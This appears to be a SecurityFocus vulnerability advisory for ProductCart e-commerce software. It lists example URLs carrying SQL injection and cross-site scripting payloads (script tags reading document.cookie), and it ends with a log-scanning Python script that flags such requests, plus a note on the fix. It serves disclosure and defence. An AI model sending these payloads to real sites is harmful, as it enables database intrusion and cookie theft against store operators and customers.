
Early Impact ProductCart Multiple Input Validation Vulnerabilities

The following examples are available:

SQL:
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory='SQL_ERROR&idSupplier=10&resultCnt=999&keyword=dcrab
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt='SQL_ERROR&keyword=dcrab
http://www.example.com/tarinasworld_butterflyjournal.asp?offset='SQL_INJECTION

XSS:
http://www.example.com/productcart/pc/NewCust.asp?redirectUrl=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/storelocator_submit.asp?countrysearch=1&country=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/productcart/pc/techErr.asp?error=<script>alert(document.cookie)</script>
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt=999&keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
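For reviewing web server logs for requests shaped like the examples above, the following added example (not part of the original advisory or of ProductCart) checks the parameters named in those URLs. It assumes the parameters listed under SQL are numeric in normal use; the sample requests are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Script and parameter names are taken from the advisory's example URLs.
# Assumption: the parameters listed under "SQL" carry integers in normal use.
NUMERIC_PARAMS = {
    "advsearch_h.asp": {"idcategory", "resultcnt"},
    "tarinasworld_butterflyjournal.asp": {"offset"},
}
MARKUP_PARAMS = {
    "newcust.asp": {"redirecturl"},
    "storelocator_submit.asp": {"country"},
    "techerr.asp": {"error"},
    "advsearch_h.asp": {"keyword"},
}
MARKUP_CHARS = set('<>"')  # characters that break out of an HTML attribute or tag


def classify(url):
    """Return (parameter, reason) findings for one logged request URL."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qs percent-decodes values, so %22%3E is inspected as ">
    for name, values in parse_qs(parts.query).items():
        key = name.lower()
        for value in values:
            digits = value.strip().lstrip("-")
            if key in NUMERIC_PARAMS.get(script, ()) and not digits.isdigit():
                findings.append((name, "non-numeric value in numeric parameter"))
            if key in MARKUP_PARAMS.get(script, ()) and MARKUP_CHARS & set(value):
                findings.append((name, "markup characters in reflected parameter"))
    return findings


def scan(requests):
    """Map each flagged request to its findings; clean requests are omitted."""
    return {r: f for r in requests if (f := classify(r))}


# Constructed sample requests (not taken from real logs).
SAMPLE_REQUESTS = [
    "/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=50&idCategory=3&resultCnt=20&keyword=lamp",
    "/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=50&idCategory='x&resultCnt=20&keyword=lamp",
    "/productcart/pc/techErr.asp?error=%3Cb%3Etest%3C/b%3E",
]

if __name__ == "__main__":
    for request, findings in scan(SAMPLE_REQUESTS).items():
        print(request, findings)
```

The same checks, applied server-side as integer parsing for the numeric parameters and HTML encoding of the reflected ones, are the corresponding input-validation fix.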







 

Copyright 2008, SecurityFocus